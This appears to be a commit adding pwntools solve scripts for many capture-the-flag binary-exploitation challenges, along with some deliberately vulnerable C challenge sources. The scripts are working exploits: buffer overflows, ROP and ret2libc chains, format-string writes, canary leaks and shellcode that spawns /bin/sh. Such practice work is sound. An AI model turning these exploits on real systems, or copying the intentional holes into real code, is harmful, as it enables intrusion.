solve script

1337up_live_2024/floormat_mega_sale/a.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./floormat_sale", checksec=False)
+# r = process()
+r = remote("floormatsale.ctf.intigriti.io", 1339)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# buf
+s(b"6")
+s(b"%1c%11$n"+p64(0x40408c))
+
+r.interactive()

1337up_live_2024/retro2win/a.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./retro2win", checksec=False)
+# r = process()
+r = remote("retro2win.ctf.intigriti.io", 1338)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# gadgets
+pop_rdi = 0x4009b3
+pop_rsi_r15 = 0x4009b1
+
+# leak
+s(b"1337")
+buf = b"A"*24
+buf += p64(pop_rdi)
+buf += p64(0x2323232323232323)
+buf += p64(pop_rsi_r15)
+buf += p64(0x4242424242424242)
+buf += p64(0)
+buf += p64(target.sym.cheat_mode)
+s(buf)
+
+r.interactive()

1337up_live_2024/rigged_slot_machine_2/a.py

@@ -0,0 +1,18 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./rigged_slot2", checksec=False)
+# r = process()
+r = remote("riggedslot2.ctf.intigriti.io", 1337)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# buf
+buf = b"A"*20 
+buf += p64(1337421)
+s(buf)
+s(b"1")
+
+r.interactive()

247ctf/confused_environment_read/a.py

@@ -0,0 +1,25 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.log_level = 'error'
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+for i in range(1, 100):
+	r = remote("5108fea3f4263a9f.247ctf.com", 50099)
+	buf = f"%{i}$s".encode()
+	try:
+		s(buf)
+		r.recvuntil(b"back ")
+		out = r.recvlineS()
+		if "247CTF" in out:
+			print(out)
+			break
+	except:
+		pass
+	r.close()
+
+r.interactive()

247ctf/hidden_flag_function/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hidden_flag_function", checksec=False)
+# r = process()
+r = remote("9fe3144560d92c37.247ctf.com", 50224)
+
+# funcs
+s = lambda a: r.sendlineafter(b"?", a)
+
+# buf
+buf = b"A"*76
+buf += p64(target.sym.flag)
+s(buf)
+
+r.interactive()

247ctf/hidden_flag_function_parameters/a.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hidden_flag_function_with_args", checksec=False)
+# r = process()
+r = remote("f3396cb78c7c71ca.247ctf.com", 50257)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*140
+buf += p32(target.sym.flag)
+buf += p32(0)
+buf += p32(0x1337)
+buf += p32(0x247)
+buf += p32(0x12345678)
+s(buf)
+
+r.interactive()

4ts_ctf_2024/pas_ouf/a.py

@@ -0,0 +1,19 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
+# r = process()
+r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*280
+buf += p64(target.sym.gets)
+buf += p64(target.sym.win)
+s(buf)
+s(b"flag")
+
+r.interactive()

4ts_ctf_2024/pas_ouf/b.py

@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
+# r = process()
+r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*272
+buf += p64(0x404118)
+buf += p64(0x40129e)
+buf += b"A"*280
+buf += p64(target.sym.main)
+s(buf)
+
+# leak
+r.recvuntil(b"@\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc = puts - 0x80e50
+log.info("libc: %#x", libc)
+system = libc + 0x50d70
+sh = libc + 0x1d8678
+
+# gadgets
+pop_rdi = libc + 0x2a3e5
+
+# pop
+buf = b"A"*280
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()

blockctf_2024/echo/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./echo-app", checksec=False)
+# r = process()
+r = remote("54.85.45.101", 8008)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*264
+buf += p64(target.sym.print_flag)
+s(buf)
+
+r.interactive()

blockctf_2024/echo/echo.c

@@ -0,0 +1,20 @@
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+
+void print_flag() {
+    puts(getenv("FLAG"));
+    puts("^^ Flag!!111!!!! ^^");
+}
+
+void do_echo() {
+    uint8_t echo_buffer[256] = {0};
+    gets(echo_buffer);
+    puts(echo_buffer);
+}
+
+int main(void) {
+    puts("ECHO! Echo! echo!");
+    do_echo();
+    return 0;
+}

blockctf_2024/echo2/a.py

@@ -0,0 +1,28 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./echo-app2", checksec=False)
+# r = process()
+r = remote("54.85.45.101", 8009)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+buf = b"%39$p.%42$p"
+s(buf)
+leaks = r.recvS(34).split(".")
+canary = int(leaks[0], 16)
+log.info("canary: %#x", canary)
+target.address = int(leaks[1], 16)-0x15a1
+log.info("main: %#x", target.address)
+
+# buf
+buf = b"A"*264
+buf += p64(canary)
+buf += p64(0)
+buf += p64(target.sym.print_flag)
+s(buf)
+
+r.interactive()

blockctf_2024/i_have_no_syscalls/a.py

@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./ihnsaims", checksec=False)
+# r = process("./ihnsaims flag{fake_flag}", shell=True)
+r = remote("54.85.45.101", 8002)
+
+# funcs
+s = lambda a: r.sendafter(b"!\n", a)
+
+# write
+s(b"1")
+
+# shellcode
+sc = """
+lea r12, [rdx]
+a:
+lea r12, [r12+0x1000]
+mov rdi, 1
+mov rsi, r12
+mov rdx, 0x1000
+mov rax, 1
+syscall
+cmp rax, -14
+je a
+jne b
+b:
+xor rdi, rdi
+mov rax, 231
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()

blockctf_2024/only_ws/a.py

@@ -0,0 +1,24 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./only_ws", checksec=False)
+# r = process()
+r = remote("54.85.45.101", 8005)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# shellcode
+sc = """
+mov rax, 1
+mov rdi, 1
+mov rsi, 0x4040a0
+xor rdx, rdx
+add dl, 0xff
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()

blockctf_2024/only_ws/only_ws.c

@@ -0,0 +1,43 @@
+#include <seccomp.h>
+#include <syscall.h>
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+#include <string.h>
+
+typedef void shellcode();
+char flag[64];
+
+int main(int argc, char **argv) {
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+  setvbuf(stderr, NULL, _IONBF, 0);
+  FILE *f = fopen("flag.txt", "r");
+  if (f == NULL) {
+    printf("error reading flag");
+    return -1;
+  }
+
+  fscanf(f, "%s", flag);
+  printf("Flag is at 0x%x\n", (void *)flag);
+  fclose(f);
+
+  char shellcode_buf[4096];
+  int bytes_read = read(STDIN_FILENO, shellcode_buf, sizeof(shellcode_buf));
+
+  void *shellcode_ptr =
+      mmap((void *)shellcode_buf, 1, PROT_READ | PROT_WRITE | PROT_EXEC,
+           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  memcpy(shellcode_ptr, shellcode_buf, bytes_read);
+
+  scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
+  seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
+  seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
+
+  seccomp_load(ctx);
+  seccomp_release(ctx);
+  ((shellcode *)shellcode_ptr)();
+}

cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/a.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./blessing", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# leak
+r.recvuntil(b"this: ")
+malloced = int(r.recv(14), 16)
+log.info("malloced: %#x", malloced)
+
+# buf
+r.recvuntil(b"song?")
+s(str(malloced+1).encode())
+s(b"0")
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/blessing/flag.txt

@@ -0,0 +1 @@
+HTB{f4k3_fl4g_f0r_t35t1ng}

cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/a.py

@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./contractor", checksec=False)
+
+while True:
+	r = process()
+
+	# funcs
+	s = lambda a,b: r.sendafter(a, b)
+	sl = lambda a,b: r.sendlineafter(a, b)
+	fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
+	opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
+
+	# leak
+	fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
+	r.recvuntil(b"C"*8)
+	target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
+	log.info("pie: %#x", target.address)
+
+	# write
+	opt(b"4", b"A"*28+p32(0)+b"\x40")
+	sl(b"> ", b"no")
+	opt(b"4", p64(target.sym.contract))
+	
+	r.recvuntil(b"lad!\n\n")
+
+	try:
+		r.sendline(b"id")
+		if r.recvline():
+			break
+	except EOFError:
+		pass
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/flag.txt

@@ -0,0 +1 @@
+HTB{f4k3_fl4g_f0r_t35t1ng}

cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py

@@ -0,0 +1,37 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./crossbow", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendlineafter(b"> ", a)
+
+# gadgets
+pop_rax = 0x401001
+pop_rdi = 0x401d6c
+pop_rsi = 0x40566b
+pop_rdx = 0x401139
+syscall = 0x4015d3
+mov_rax_rdi = 0x4020f5
+
+# buf
+buf = b"JUNK"*2
+buf += p64(pop_rax)
+buf += b"/bin/sh\0"
+buf += p64(pop_rdi)
+buf += p64(0x40d500)
+buf += p64(mov_rax_rdi)
+buf += p64(pop_rax)
+buf += p64(59)
+buf += p64(pop_rsi)
+buf += p64(0)
+buf += p64(pop_rdx)
+buf += p64(0)
+buf += p64(syscall)
+s(b"-2")
+ss(buf)
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py

@@ -0,0 +1,42 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./laconic", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# gadgets
+pop_rax = 0x43018
+syscall = 0x43015
+
+# sigframe
+frame = SigreturnFrame()
+frame.rax = 0
+frame.rdi = 0
+frame.rsi = 0x43005
+frame.rdx = 0xff
+frame.rip = syscall
+
+# buf
+buf = b"A"*8
+buf += p64(pop_rax)
+buf += p64(0xf)
+buf += p64(syscall)
+buf += bytes(frame)
+
+# shellcode
+sc = """
+lea rdi, [rsi+32]
+xor rsi, rsi
+xor rdx, rdx
+mov al, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+buf += sc
+s(buf)
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/a.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./quack_quack", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendafter(b"> ", a)
+
+# buf
+buf = b"A"*89
+buf += b"Quack Quack "
+buf += b"B"
+s(buf)
+r.recvuntil(b"Quack Quack ")
+canary = u64(r.recv(7).rjust(8, b"\x00"))
+log.info("canary: %#x", canary)
+
+# buf
+buf = b"A"*88
+buf += p64(canary)
+buf += b"JUNK"*2
+buf += p64(target.sym.duck_attack)
+s(buf)
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/quack_quack/flag.txt

@@ -0,0 +1 @@
+HTB{f4k3_fl4g_4_t35t1ng}

kuwait_hackathon_2024/last_key/a.py

@@ -0,0 +1,48 @@
+#!/usr/bin/python3
+
+from pwn import *
+from ctypes import CDLL
+
+context.binary = target = ELF("./last_key", checksec=False)
+libc = target.libc
+lib = CDLL("./glibc/libc.so.6")
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# nums
+lib.srand(lib.time(0))
+first_rand = (lib.rand() % 5) + 1
+second_rand = (lib.rand() % 10) + 10
+diff = second_rand - first_rand
+
+# buf
+for _ in range(diff):
+	s(b"R")
+
+# gadgets
+pop_rdi = lambda a: p64(0x40178d) + p64(a)
+
+# leak
+buf = b"A"*24
+buf += pop_rdi(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.set_score)
+s(buf)
+r.recvuntil(b"prize..\n\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+system = libc.sym.system
+sh = next(libc.search(b"/bin/sh\0"))
+
+# pop
+buf = b"A"*25
+buf += pop_rdi(sh)
+buf += p64(0x40178e)
+buf += p64(system)
+s(buf)
+
+r.interactive()

kuwait_hackathon_2024/riddle/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./riddle", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b">> ", a)
+ss = lambda a: r.sendlineafter(b": ", a)
+
+# buf
+s(b"1")
+ss(b"2147483647")
+ss(b"1")
+
+r.interactive()

p3rf3ctr00t_ctf_2024/daily_rootine/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./challenge", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 5050)
+
+# funcs
+s = lambda a: r.sendlineafter(b"> ", a)
+ss = lambda a: r.sendline(a)
+
+# buf
+s(b"12")
+ss(b"flag.txt\0")
+
+r.interactive()

p3rf3ctr00t_ctf_2024/flow/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./flow", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 7001)
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# buf
+buf = b"A"*60
+buf += p32(0x34333231)
+s(buf)
+
+r.interactive()

p3rf3ctr00t_ctf_2024/heap_wars/a.py

@@ -0,0 +1,18 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./heap_wars", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1337)
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# buf
+s(b"1")
+buf = b"A"*80
+buf += p64(target.sym.theForce)
+s(buf)
+
+r.interactive()

p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py

@@ -0,0 +1,32 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./heaps_dont_lie", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1244)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+buf = b"%7$p"
+s(buf)
+r.recvuntil(b"tune : ")
+heap = int(r.recvline().strip(), 16) + 0x850
+log.info("heap: %#x", heap)
+
+# sc
+sc = """
+lea rdi, [rdx+19]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+sc += b"A"*(32-len(sc))
+sc += p64(heap)
+s(sc)
+
+r.interactive()

p3rf3ctr00t_ctf_2024/nihil/a.py

@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./nihil", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 7002)
+
+# funcs
+s = lambda a: r.sendlineafter(b"?", a)
+
+# buf
+s(b"a")
+buf = b"A"*16
+buf += p64(0)
+buf += b"JUNK"
+buf += p32(727)
+s(buf)
+
+r.interactive()

p3rf3ctr00t_ctf_2024/sea_shells/a.py

@@ -0,0 +1,65 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./challenge", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1243)
+
+# funcs
+s = lambda a: r.sendline(a)
+inc = lambda: r.sendline(b"2")
+
+# read
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+s(b"4")
+s(b"3")
+s(b"5") # 89
+inc()
+for i in range(2): s(b"4")
+for i in range(2): s(b"3")
+for i in range(5): s(b"6")
+s(b"5") # d6
+inc()
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+for i in range(4): s(b"3")
+for i in range(6): s(b"6")
+s(b"5") # 31
+inc()
+for i in range(2): s(b"4")
+for i in range(3): s(b"6")
+s(b"3")
+s(b"5") # d2
+inc()
+for i in range(2): s(b"4")
+for i in range(9): s(b"6")
+for i in range(2): s(b"3")
+s(b"5") # b2
+inc()
+for i in range(17): s(b"5") # ff
+inc()
+s(b"5") # 0f
+inc()
+for i in range(2): s(b"3")
+s(b"5")
+for i in range(6): s(b"6") # 05
+s(b"7")
+
+# execve
+sc = """
+lea rdi, [rsi+35]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
+s(sc)
+
+r.interactive()

random_challs/classic_fmtstring/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./fmt", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+s(b"%136$p.%137$p")
+r.recvuntil(b"Here: ")
+out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
+print(out)
+
+r.interactive()

random_challs/classroom/a.py

@@ -0,0 +1,65 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./classroom", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendafter(b"> ", a)
+ss = lambda a: r.send(a)
+
+# gadgets
+pop_rdi = lambda a: p64(0x400c43) + p64(a)
+pop_rsi = lambda a: p64(0x400c41) + p64(a) + p64(0)
+
+# loop
+s(b"a")
+for i in range(4):
+	s(b"y")
+	s(b"a")
+s(b"y")
+
+# leak
+buf = b"A"*136
+buf += pop_rdi(1)
+buf += pop_rsi(target.got.write)
+buf += p64(target.sym.write)
+buf += pop_rdi(0)
+buf += pop_rsi(0x60203c)
+buf += p64(target.sym.read)
+buf += p64(target.sym.kinder)
+s(buf)
+write = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("write: %#x", write)
+libc.address = write - libc.sym.write
+log.info("libc: %#x", libc.address)
+
+# gadgets
+jmp_rsi = libc.address + 0x3acf4
+
+# shellcode
+sc = """
+lea rdi, [rsp-87]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 2
+syscall
+mov rdi, rax
+mov rsi, 0x602500
+mov dl, 0xff
+mov rax, 0
+syscall
+mov rdi, 1
+mov rax, 1
+syscall
+"""
+sc = asm(sc) + b"flag.txt\0"
+sc += b"A"*(136-len(sc))
+sc += p64(jmp_rsi)
+ss(p64(4))
+s(b"a")
+s(sc)
+
+r.interactive()

random_challs/echoooo/a.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./chal", checksec=False)
+libc = target.libc
+
+# bruteforce lower 12 bits
+def brute():
+	for a in range(1, 256):
+		for b in range(8, 256, 16):
+			r = process(level="error")
+			partial_ret = (a << 8) | b
+			write = (0x61 - (partial_ret & 0xff)) & 0xff
+			buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+			buf += f"%{write}c%48$hhn".encode()
+			r.sendlineafter(b": ", buf)
+			try:
+				r.recvuntil(b"Type")
+				return r, partial_ret
+			except:
+				r.kill()
+				continue
+
+# leak
+r, partial_ret = brute()
+log.info("ret: %#x", partial_ret)
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+r.sendlineafter(b": ", buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+log.info("libc: %#x", libc.address)
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = int(hex(libc.sym.system)[-4:], 16)
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+r.sendline(b"/bin/sh")
+
+r.interactive()
+
+"""
+# write
+partial_ret = 0xe068
+write = (0x61 - (partial_ret & 0xff)) & 0xff
+buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+buf += f'%{write}c%48$hhn'.encode()
+s(buf)
+
+# leak
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+s(buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = 0x38f0
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+"""

random_challs/hide/a.py

@@ -0,0 +1,14 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hide", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+s(b"%160c%hhn%6$s")
+
+r.interactive()

random_challs/jmp_to_win/a.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./vuln", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# leak
+s(b"%23$p")
+main = int(r.recvline(), 16)
+log.info("main: %#x", main)
+win = main - 0x96
+log.info("win: %#x", win)
+
+# jmp
+s(str(hex(win)).encode())
+
+r.interactive()

random_challs/jmp_to_win/source.c

@@ -0,0 +1,56 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+
+void segfault_handler() {
+  printf("Segfault Occurred, incorrect address.\n");
+  exit(0);
+}
+
+void call_functions() {
+  char buffer[64];
+  printf("Enter your name:");
+  fgets(buffer, 64, stdin);
+  printf(buffer);
+
+  unsigned long val;
+  printf(" enter the address to jump to, ex => 0x12345: ");
+  scanf("%lx", &val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}
+
+int win() {
+  FILE *fptr;
+  char c;
+
+  printf("You won!\n");
+  // Open file
+  fptr = fopen("flag.txt", "r");
+  if (fptr == NULL)
+  {
+      printf("Cannot open file.\n");
+      exit(0);
+  }
+
+  // Read contents from file
+  c = fgetc(fptr);
+  while (c != EOF)
+  {
+      printf ("%c", c);
+      c = fgetc(fptr);
+  }
+
+  printf("\n");
+  fclose(fptr);
+}
+
+int main() {
+  signal(SIGSEGV, segfault_handler);
+  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+  call_functions();
+  return 0;
+}

random_challs/mad_seccomp/a.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./mad_seccomp", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = """
+lea rsi, [rax+108]
+lea rdx, [rax+200]
+mov QWORD PTR [rdx], 2
+mov QWORD PTR [rdx+16], 16
+mov rax, 437
+mov rdi, -100
+mov r10, 24
+syscall
+mov rdi, rax
+mov al, 17
+lea rsi, [rdx+100]
+mov rdx, 100
+sub r10b, r10b
+syscall
+lea r11, [rsi]
+mov QWORD PTR [rsi+100], r11
+mov QWORD PTR [rsi+108], rax
+mov rdi, 1
+lea rsi, [rsi+100]
+mov rdx, 1
+mov rax, 20
+syscall
+"""
+sc = asm(sc)
+sc += b"flag.txt\0"
+s(sc)
+
+r.interactive()

random_challs/mad_seccomp/read_file.c

@@ -0,0 +1,44 @@
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <linux/openat2.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <string.h>
+
+int main(void){
+	// get syscall num
+	printf("openat2: %d\n", SYS_openat2);
+	printf("pread64: %d\n", SYS_pread64);
+	printf("writev: %d\n", SYS_writev);
+
+	// struct
+	struct open_how how;
+	memset(&how, 0, sizeof(how));
+	how.flags = O_RDWR;
+	how.resolve = RESOLVE_IN_ROOT;
+	size_t size = sizeof(how);
+
+	// openat2
+	const char *file = "flag.txt";
+	long rax = syscall(SYS_openat2, AT_FDCWD, file, &how, size);
+	printf("fd: %d\n", rax);
+
+	// pread64
+	char buf[64];
+	long rax2 = syscall(SYS_pread64, rax, buf, 100, 0);
+	printf("string size: %d\n", rax2);
+
+	// struct
+	char *str = "Some string here";
+	struct iovec {
+	    void  *iov_base;
+	    size_t iov_len;
+	};
+	struct iovec iov[1];
+	iov[0].iov_base = str;
+	iov[0].iov_len = strlen(str);
+
+	// writev
+	syscall(SYS_writev, 1, iov, 1);
+	return 0;
+}

random_challs/namelen/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./namelen", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*7
+buf += b"i"
+buf += b"A"*(20-len(buf))
+s(buf)
+
+r.interactive()

random_challs/secure_birdy/a.py

@@ -0,0 +1,67 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./securebirdy", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendafter(b">> ", a)
+ss = lambda a: r.sendlineafter(b">>> ", a)
+sss = lambda a: r.sendafter(b">>> ", a)
+
+# overwrite canary pointer
+s(b"2")
+ss(b"2147483648")
+buf = b"A"*160
+buf += p64(0x7fffff0000)
+sss(buf)
+s(b"1")
+
+# new canary
+canary = 0xffff0000400000
+
+# gadgets
+pop_rdi = 0x400ce3
+
+# leak
+buf = b"A"*144
+buf += p64(canary)
+buf += b"A"*(184-len(buf))
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.main)
+s(b"2")
+ss(b"2147483648")
+sss(buf)
+s(b"3")
+r.recvuntil(b"OK\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: 0x%lx", puts)
+libc = puts - 0x77640
+log.info("libc: 0x%lx", libc)
+sh = libc + 0x197e34
+
+# overwrite canary pointer
+s(b"2")
+ss(b"2147483648")
+buf = b"A"*160
+buf += p64(0x7fffff0000)
+sss(buf)
+s(b"1")
+
+# pop
+buf = b"A"*144
+buf += p64(canary)
+buf += b"A"*(184-len(buf))
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(target.sym.system)
+s(b"2")
+ss(b"2147483648")
+sss(buf)
+s(b"3")
+
+r.interactive()

random_challs/shellcodeburr/a.py

@@ -0,0 +1,23 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./chall", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b": ")
+stack_addr = int(r.recvline(), 16)
+log.info("stack_addr: %#x", stack_addr)
+
+# buf
+sc = asm(shellcraft.sh())
+sc += b"\x90"*(88-len(sc))
+buf = sc
+buf += p64(stack_addr)
+s(buf)
+
+r.interactive()

random_challs/shellhard/a.py

@@ -0,0 +1,38 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./shellhard", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# stage 1 
+sc = """
+mov rsi, rdx
+cqo
+mov dl, 0xff
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+# stage 2
+sc = """
+lea rsi, [rcx+48]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+mov rax, 257
+syscall
+mov rsi, rax
+mov rdi, 1
+add r10b, 0xff
+mov rax, 40
+syscall
+"""
+sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
+s(sc)
+
+r.interactive()

random_challs/valley/a.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./valley", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendline(a)
+
